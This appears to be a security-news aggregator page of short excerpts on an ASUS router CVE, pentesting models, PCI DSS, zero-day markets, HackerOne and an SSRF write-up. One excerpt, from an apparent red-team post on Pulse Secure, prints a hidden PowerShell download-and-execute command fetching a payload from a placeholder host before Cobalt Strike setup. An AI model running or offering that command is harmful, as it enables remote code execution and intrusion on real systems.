CVE-2024-2080: ASUS warns customers
ASUS announces major Firmware Update ASUS recently issued a firmware update to resolve a critical security vulnerability affecting seven different variants of its router models.…
Category: Mix
Community-driven PTaaS vs. Traditional Pentesting
Modern pentesting approaches use independent security researchers working under strict NDAs and advanced software platforms to streamline the process. However, with many vendors focusing on…
What You Need to Know and What the End of v3.2.1 Means for the Future of Digital Payments –
On March 31st, 2024, The Payments Card Industry Standards Security Council (PCI SSC) officially retired version 3.2.1 of the PCI Data Security Standard (PCI DSS)…
How Zerodium, BugTraq, and Fear contributed to the Rise of the Zero-Day Vulnerability Black Market –
Whenever a company is notified about or discovers a critical flaw in their system/application that has the potential to be exploited by malicious elements, it’s…
A List of My Hard-won Life Lessons
I’m working on my context.md file for my personal Digital Assistant, and one part of that will be my model.md file, which is basically life…
The Fast-Slow Problem
I’ve been obsessed lately with the concept of slow versus fast. I’m calling it the Fast-Slow Problem. It refers to the speed and amount of…
HackerOne’s Cloud Security Capabilities for AWS Customers
HackerOne provides security capabilities for AWS customers looking to improve security in their cloud applications. These include vulnerability pentests specific to AWS environments, an AWS…
What HackerOne Customers Can Tell You About Securing Organizational Buy-In for Ethical Hackers
Securing Organizational Buy-in For Ethical Hackers CISOs and other security leaders are challenged to demonstrate the benefits of working with ethical hackers and secure budget…
Piercing the Veil: Server Side Request Forgery to NIPRNet access | by Alyssa Herrera
The second Jira website I discovered was surprisingly harder to exploit. It didn’t give me the verbose errors like the one I discussed and showed…
Hacking Pulse Secure for Redteaming
The code we used for the batch script is below. @echo off powershell.exe -nop -w hidden -c “IEX ((new-object net.webclient).downloadstring(‘http://your-ip/payload))” Setting up Cobalt Strike Now…
Sub-Venture Scale Security Problems
Thank you to Kane for coming up with the main thesis and as primary author of this piece. Check out his blog for a lot…
Launching new domains view and enhanced policies
We’ve recently announced a new Domains page and major improvements to existing capabilities for setting custom attack surface policies. These updates bring unprecedented control over…